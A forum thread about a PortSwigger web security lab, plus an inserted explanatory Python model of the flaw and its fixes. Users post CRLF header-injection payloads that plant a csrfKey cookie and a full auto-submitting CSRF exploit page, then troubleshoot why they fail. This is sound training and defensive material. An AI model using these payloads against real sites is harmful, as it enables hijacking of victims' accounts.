The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: CSRF where token is tied to non-session cookie

P1N | Last updated: Jun 04, 2024 03:39PM UTC

These are also incorrectly processed by my lab; my payload in the search does not read properly. Everything is fine in the response, but the next request does not execute.

Request:

    GET /?search=test%0d%0aSet-Cookie:%20csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg%3b%20SameSite=None HTTP/2

Response:

    HTTP/2 200 OK
    Set-Cookie: LastSearchTerm=test
    Set-Cookie: csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg; SameSite=Non; Secure; HttpOnly
    Set-Cookie: session=kQbiYYVQ0pKfGQeLoFbIWROUaSHoj72m; Secure; HttpOnly; SameSite=None

Next request:

    POST /my-account/change-email HTTP/2
    Host: 0a9800f803d7e13f80da94be00c10097.web-security-academy.net
    Cookie: csrfKey=H5AnPN2IfpZe7bJPos8rqbUcIviDZNlz; session=4VVtwDlnyFLYMXm1voOQaGhQM5dwoav3

The csrf has not changed. Why?

João | Last updated: Jun 04, 2024 04:36PM UTC

I just posted my take on this issue. Let's see if anyone adds something.

Ben, PortSwigger Agent | Last updated: Jun 05, 2024 07:28AM UTC

Hi both, I have responded to your forum post João but to confirm, yes, there are some issues following the entirety of the written solution in conjunction with the embedded browser based on some restrictions with cookies. We believe that using a normal version of Chrome should still work at this point in time, however (this is obviously subject to change in the future).

Usmonbek | Last updated: Jul 28, 2024 03:24PM UTC

Hello, I'm experiencing an issue where the carlos account generates a CSRF token only once. After testing the exploit in my browser, I couldn't deliver it to the victim user "wiener" via the attacker's exploit server because it indicates the CSRF token is invalid. I've refreshed my browser to obtain a new CSRF token, but it is not generating. Could you please assist me in resolving this issue or provide guidance on how to proceed? Thank you.

Ben, PortSwigger Agent | Last updated: Jul 28, 2024 03:31PM UTC

Hi, Are you able to provide us with some details of the steps you are carrying out so that we can see exactly what you are doing?

Usmonbek | Last updated: Jul 28, 2024 07:32PM UTC

Hi again. These are the steps I've taken to solve the lab:

1. Launched the "CSRF where token is tied to non-session cookie" lab.

2. Logged in to wiener's account.

3. Intercepted the "Update email" form submission request and sent the request to Burp Repeater. Example:

    POST /my-account/change-email HTTP/2
    Host: LAB_ID.web-security-academy.net
    Cookie: session=**************; csrfKey=*************************
    Content-Type: application/x-www-form-urlencoded
    Referer: https://LAB_ID.web-security-academy.net/my-account?id=wiener

    email=test%40test.de&csrf=taIQ3lsPF3IW4fs9Ll1je9c9x59f7V4U

4. Opened an incognito browser window, logged in to Carlos's account and obtained a CSRF token with csrfKey by using "Developer Tools".
   CSRF token:
   CSRF key:

5. Submitted the obtained valid CSRF token and CSRF key from wiener's account. Example:

    POST /my-account/change-email HTTP/2
    Host: LAB_ID.web-security-academy.net
    Cookie: session=*******************; csrfKey=<<"obtained CSRF cookie HERE">>
    Content-Type: application/x-www-form-urlencoded
    Referer: https://LAB_ID.web-security-academy.net/my-account?id=wiener

    email=test%40test.de&csrf=<<"obtained CSRF token here">>

6. Went back to the original browser, performed a search from wiener's page and sent the resulting request to Burp Repeater. Example:

    GET /?search=hat HTTP/2
    Host: LAB_ID.web-security-academy.net
    Cookie: session=****************; csrfKey=***************************
    Referer: https://LAB_ID.web-security-academy.net/

7. Changed the GET request and sent it, and I got a 200 response:

    GET /?search=green%0d%0aSet-Cookie:%20csrfKey=YOUR-CSRF_COOKIE HTTP/2
    Host: LAB_ID.web-security-academy.net
    Cookie: session=*************; csrfKey=******************
    Referer: https://LAB_ID.web-security-academy.net/

8. Created an exploit and tried to get a new CSRF token and CSRF key from Carlos's account again in order to use them in my exploit.

In this situation, Carlos's account didn't give a new token, and it was impossible to use the exploit with the old one: when I tried the exploit with the already-used CSRF token and CSRF key, it gave me the error message "Invalid CSRF token". Thanks.

Ben, PortSwigger Agent | Last updated: Jul 29, 2024 08:41AM UTC

Hi, Are you able to confirm what the final exploit that you are delivering looks like?

Usmonbek | Last updated: Jul 29, 2024 12:27PM UTC

Hi, in my final exploit I've used the exploit code from the community solution "CSRF - Lab #5 CSRF where token is tied to non-session cookie | Short Version" (Rana Khalil video):

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <script>history.pushState('', '', '/')</script>
        <form action="https://LAB_ID.web-security-academy.net/my-account/change-email" method="POST">
          <input type="hidden" name="email" value="jack2%40test.ca"/>
          <input type="hidden" name="csrf" value="CSRF_TOKEN_HERE"/>
          <input type="submit" name="Submit request"/>
        </form>
        <!-- header-injection request: plants the csrfKey cookie, then onerror submits the form above -->
        <img src="https://LAB_ID.web-security-academy.net/?search=black%0d%0aSet-Cookie:%20csrfKey=CSRF_KEY_HERE" onerror="document.forms[0].submit()">
      </body>
    </html>

Dominyque, PortSwigger Agent | Last updated: Jul 30, 2024 08:05AM UTC

Hi Usmonbek, If you do not URL-encode the email address and leave it as is, for example, jack2@test.ca, does this then work? Or are you getting the same issue?

Usmonbek | Last updated: Jul 30, 2024 10:59AM UTC

Hello, Thank you for your response. I’ve tested it as suggested by not URL-encoding the email address and using it as is (jack2@test.ca). However, I am still encountering the same issue: the CSRF token is still reported as invalid. It seems to me that the root of the problem may be related to the CSRF token not being regenerated for the Carlos account. Despite trying various approaches and ensuring that all details are entered correctly, the token issue persists. Could you please provide guidance on how to address this issue or confirm if this is a known problem with the lab? Thank you.

Dominyque, PortSwigger Agent | Last updated: Jul 31, 2024 07:14AM UTC

Hi Usmonbek And to confirm, are you changing the email address being used in your exploit between testing this on yourself (via the 'View exploit' functionality) and delivering the exploit to the victim user?

Usmonbek | Last updated: Jul 31, 2024 10:06AM UTC

Hi, Yes, I am changing the email address between testing and delivering the exploit.

Krya | Last updated: Jul 31, 2024 11:49AM UTC

Hi. I have the same trouble, with the current version of Chrome. The offered part of the payload '<img src="/?search=test%0d%0aSet-Cookie:%20csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg%3b%20SameSite=None">' didn't work for me. The cookies are ignored by the browser: they aren't sent via this request and aren't changed.

Usmonbek | Last updated: Jul 31, 2024 06:23PM UTC

Hello, I successfully resolved the lab by addressing the CSRF token problem. I generated a new CSRF token and CSRF cookie by signing in and out with the Carlos account. Here's how I did it:

1. Logged in with wiener's account and submitted the "Update email" form.

2. Located the request in the HTTP request tab and sent it to Burp Repeater.

3. Opened a private browser window, logged in with the Carlos account, and used the developer tools to obtain the CSRF key and CSRF token. Noted them.

4. Replaced the token and csrfKey in the "Update email" form request with the ones obtained from Carlos's account, then sent the request and confirmed a 200 response.

5. Logged out of the Carlos account and closed the incognito browser. This step was crucial for me.

6. Returned to wiener's account, pressed the Home button, performed a search, and sent the search request to Burp Repeater. Used the provided payload /search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None, replacing YOUR-KEY with the CSRF cookie obtained earlier. This step was also crucial for me.

7. Opened a new private browser window, logged in again with the Carlos account, and obtained a new CSRF token and CSRF cookie.

8. Updated the email here with the new CSRF token and cookies, and then created a new payload with the latest CSRF token and cookies.

9. Delivered the payload to the target and solved the lab.
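As an added example that is not part of this thread or of PortSwigger's lab code, the following Python script models the two server-side behaviours the posts above are exploiting: a change-email check whose CSRF token is tied to the csrfKey cookie rather than to the session, and a search endpoint that reflects the search term into a Set-Cookie header, so an encoded CRLF (%0d%0a) splits off an attacker-controlled "Set-Cookie: csrfKey" line. The way the token is bound to csrfKey (an HMAC under a server secret), the cookie-jar model, and every key, secret and name in it are assumptions constructed for the demonstration; the lab's real implementation is not shown on this page. The script also shows the two fixes a practitioner would expect: rejecting CR/LF in reflected header values, and binding the token to the authenticated session.

```python
"""Model of the 'CSRF token tied to a non-session cookie' weakness.

Added example, not PortSwigger's lab code. Assumptions (constructed for the
demo, not taken from the lab): the token is an HMAC of the csrfKey cookie
under a server secret; the search term is reflected into a
Set-Cookie: LastSearchTerm header; a tiny cookie jar in which a later
Set-Cookie for the same name overwrites the earlier value.
"""
import hashlib
import hmac
import secrets
from urllib.parse import unquote

SERVER_SECRET = b"constructed-demo-secret"  # assumption: not a real key


def issue_csrf_key() -> str:
    """Value of the csrfKey cookie handed out to a browser (constructed)."""
    return secrets.token_urlsafe(24)


def csrf_token_for(csrf_key: str) -> str:
    """Vulnerable design: the token depends only on csrfKey, never on the session.
    Anyone who can plant their own csrfKey in the victim's browser therefore
    also holds a token the server will accept alongside that cookie."""
    return hmac.new(SERVER_SECRET, csrf_key.encode(), hashlib.sha256).hexdigest()[:32]


def validate_change_email(cookies: dict, form: dict) -> bool:
    """Vulnerable check used by /my-account/change-email in this model."""
    key = cookies.get("csrfKey")
    return key is not None and hmac.compare_digest(csrf_token_for(key), form.get("csrf", ""))


def validate_change_email_fixed(cookies: dict, form: dict, session_store: dict) -> bool:
    """Fixed check: the expected token is looked up from the authenticated session."""
    expected = session_store.get(cookies.get("session"), {}).get("csrf")
    return expected is not None and hmac.compare_digest(expected, form.get("csrf", ""))


def search_response_headers(raw_search: str) -> list:
    """Vulnerable search handler: the URL-decoded term lands verbatim in a
    response header, so %0d%0a becomes a real CRLF and starts a new header."""
    block = "Set-Cookie: LastSearchTerm=" + unquote(raw_search)
    headers = []
    for line in block.split("\r\n"):  # models a serializer writing the raw CRLF
        name, _, value = line.partition(": ")
        headers.append((name, value))
    return headers


def search_response_headers_fixed(raw_search: str) -> list:
    """Fixed search handler: CR/LF can never reach a header value."""
    term = unquote(raw_search)
    if "\r" in term or "\n" in term:
        raise ValueError("CR/LF not permitted in a header value")
    return [("Set-Cookie", "LastSearchTerm=" + term)]


def apply_set_cookies(jar: dict, headers: list) -> dict:
    """Minimal cookie-jar model: each Set-Cookie stores name=value (attributes
    ignored); a later Set-Cookie for the same name overwrites the earlier one."""
    for name, value in headers:
        if name.lower() == "set-cookie":
            cname, _, cval = value.split(";", 1)[0].partition("=")
            jar[cname.strip()] = cval.strip()
    return jar


def demo() -> dict:
    """Replays the thread's attack against the model and returns the outcomes."""
    # Attacker logs in to their own account (carlos in the thread) and reads
    # a valid csrfKey/csrf pair from the developer tools.
    attacker_key = issue_csrf_key()
    attacker_token = csrf_token_for(attacker_key)

    # Victim's browser (wiener) carries its own session and csrfKey.
    victim_jar = {"session": "victim-session", "csrfKey": issue_csrf_key()}
    session_store = {"victim-session": {"csrf": secrets.token_urlsafe(24)}}

    # The exploit page's <img src="/?search=..."> makes the victim's browser
    # fetch this URL; the search handler echoes the injected Set-Cookie line.
    payload = "test%0d%0aSet-Cookie:%20csrfKey=" + attacker_key + "%3b%20SameSite=None"
    apply_set_cookies(victim_jar, search_response_headers(payload))

    # onerror then auto-submits the form with the attacker's token in the body.
    form = {"email": "attacker@example.com", "csrf": attacker_token}

    try:
        search_response_headers_fixed(payload)
        reflection_rejected = False
    except ValueError:
        reflection_rejected = True

    return {
        "victim_csrfKey_overwritten": victim_jar["csrfKey"] == attacker_key,
        "vulnerable_check_accepts": validate_change_email(victim_jar, form),
        "session_bound_check_accepts": validate_change_email_fixed(victim_jar, form, session_store),
        "crlf_rejected_by_fix": reflection_rejected,
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Running demo() replays the sequence the thread describes: the injected Set-Cookie overwrites the victim's csrfKey, the attacker's token is then accepted together with the victim's session cookie, and either fix on its own stops the attack. What the model deliberately leaves out is the browser side, namely whether the injected cookie survives the browser's Secure and SameSite handling and is actually attached to the cross-site POST; that is the part Ben refers to above when he mentions cookie restrictions in the embedded browser, and it is why the same exploit HTML can behave differently across browsers.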

Dominyque, PortSwigger Agent | Last updated: Aug 01, 2024 07:16AM UTC